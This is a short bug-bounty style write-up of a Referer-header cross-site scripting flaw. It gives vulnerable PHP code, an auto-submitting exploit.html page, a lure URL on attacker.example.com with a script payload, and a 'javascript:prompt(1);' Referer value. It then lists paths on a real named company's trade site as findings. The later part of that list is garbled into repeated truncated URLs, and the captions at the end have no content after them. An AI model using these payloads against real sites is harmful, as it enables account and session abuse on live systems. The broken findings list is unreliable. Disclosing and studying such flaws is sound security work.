Little Insight:
The value of the Referer HTTP header is copied into a
JavaScript string which is encapsulated in double quotation marks or referer page back link . The
payload Referer: javascript:prompt(1); was submitted in the Referer HTTP header. This input was store on page back link when user click back link that's make an XSS.
How This Work?
Suppose we have an application that generates a "Back" link from Referer header
<?php echo '<a href="'; echo $_SERVER['HTTP_REFERER']; echo '">Back</a>\n'; ?>
We can inject HTML and JavaScript if we can set the Referer header. This can be done if we first get the victim to visit a page created by the attacker. Consider the following page (let's call it exploit.html):
<html> <body> <form id="jeet" name="jeet" method="GET" action="http://victim.example.com/xss.php"> </form> <script> document.getElementById("jeet").submit(); </script> </body> </html>
If the victim is tricked into visiting
http://attacker.example.com/exploit.html?<script>alert(1);</script>
he will end up on the vulnerable page with the Referer header containing XSS attack.
This attack works in Internet Explorer, but does not work in Firefox, because Firefox will URL-encode the characters after the question mark.
My Finding....
https://trade.online.nokia. com/cps/
https://trade.online.nokia. com/cps/script/
https://trade.online.nokia. com/cps/script/common/
https://trade.online.nokia. com/cps/script/console/.
https://trade.online.nokia. com/cps/script/preview/.
https://trade.online.nokia. com/cps/theme/common/ corporate/style/.
https://trade.online.nokia. com/cps/theme/common/ corporate/
https://trade.online.nokia. com/cps/theme/common/
https://trade.online.nokia. com/cps/theme/
https://trade.online.nokia. com/cps/theme/console/ corporate/style/
https://trade.online.nokia. com/cps/theme/console/ corporate/
https://trade.online.nokia. com/cps/theme/console/
https://trade.online.nokia. com/login/fonts/.
https://trade.online.nokia. com/pics/
https://trade.online.nokia. com/pictures/
https://trade.online.nokia. com/siteminderagent/dmspages/.
https://trade.online.nokia. com/siteminderagent/forms/.
https://trade.online.nokia. com/siteminderagent/
https://trade.online.nokia. com/siteminderagent/pw/.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
https://trade.online.nokia.
Continue..............
Normal Request..
After Payload...
Xss....on back link..